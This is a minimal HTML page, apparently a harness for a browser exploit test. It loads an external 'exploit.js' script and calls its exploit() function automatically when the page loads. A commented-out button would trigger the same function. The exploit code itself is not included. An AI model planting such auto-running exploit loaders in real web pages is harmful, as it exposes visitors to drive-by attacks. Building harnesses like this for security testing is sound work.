<html> <head> <script src="exploit.js"></script> </head> <body onload="exploit()"> hi there.. <!-- <input type="button" value="Exploit me" onclick="exploit()"> --> </body> </html>